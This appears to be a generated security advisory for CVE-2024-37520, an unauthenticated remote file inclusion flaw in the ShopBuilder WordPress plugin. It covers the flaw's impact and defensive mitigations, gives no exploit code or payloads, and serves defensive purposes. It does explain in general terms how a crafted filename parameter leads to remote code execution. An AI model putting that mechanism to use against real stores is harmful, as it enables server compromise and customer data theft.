CVE-2024-37520 is a Remote File Inclusion (RFI) vulnerability identified in the RadiusTheme ShopBuilder – Elementor WooCommerce Builder Addons plugin for WordPress, specifically in versions up to and including 2.1.12. The vulnerability stems from improper validation and control of filenames used in PHP include or require statements within the plugin's codebase. This flaw allows an attacker to supply a crafted filename parameter that references a remote malicious file, which the PHP interpreter then includes and executes on the server. Since PHP's include/require statements execute code from the specified file, this leads to remote code execution (RCE) on the affected web server. The vulnerability does not require authentication, meaning any unauthenticated attacker can exploit it if the plugin is installed and active. The plugin is commonly used to extend WooCommerce functionality with Elementor page builder integration, making it prevalent in WordPress e-commerce sites. Although no public exploits have been reported yet, the nature of RFI vulnerabilities makes them highly dangerous, as they can lead to complete compromise of the web server, data breaches, defacement, or use of the server as a pivot point for further attacks. The vulnerability was reserved in June 2024 and published in July 2024, but no CVSS score has been assigned yet. The lack of patch links suggests a fix may still be pending or in development. Given the widespread use of WooCommerce and Elementor, this vulnerability poses a significant risk to online stores using this plugin.

The impact of CVE-2024-37520 is potentially severe for organizations running WordPress e-commerce sites with the vulnerable ShopBuilder plugin. Exploitation can lead to remote code execution, allowing attackers to execute arbitrary PHP code on the web server. This can result in full site compromise, including theft or manipulation of customer data, injection of malicious content, defacement, or use of the compromised server to launch attacks against other targets. The availability of the site may be disrupted if attackers deploy ransomware or delete critical files. The integrity and confidentiality of sensitive business and customer information are at high risk. Since the vulnerability requires no authentication, the attack surface is broad, increasing the likelihood of exploitation once public proof-of-concept or exploit code becomes available. Organizations could face reputational damage, financial losses, and regulatory penalties if customer data is exposed. The threat is especially critical for online retailers relying on WooCommerce and Elementor integrations, as these are common targets for cybercriminals seeking to monetize compromised e-commerce platforms.

To mitigate CVE-2024-37520, organizations should take immediate and specific actions beyond generic advice. First, monitor RadiusTheme and official plugin repositories for an official patch or update addressing this vulnerability and apply it promptly once available. Until a patch is released, consider disabling or uninstalling the ShopBuilder plugin if feasible to eliminate the attack vector. Implement strict input validation and sanitization on any parameters that control file inclusion paths, restricting them to known safe directories and disallowing remote URLs. Employ a Web Application Firewall (WAF) with rules designed to detect and block attempts to exploit file inclusion vulnerabilities, such as requests containing suspicious URL parameters or remote file references. Restrict outbound HTTP/HTTPS requests from the web server to prevent fetching remote malicious files. Conduct regular security audits and vulnerability scans focused on WordPress plugins and themes. Additionally, maintain comprehensive backups of the website and databases to enable rapid recovery in case of compromise. Educate development and operations teams about secure coding practices related to file inclusion and PHP execution. Finally, consider using security plugins that monitor file integrity and alert on unauthorized changes.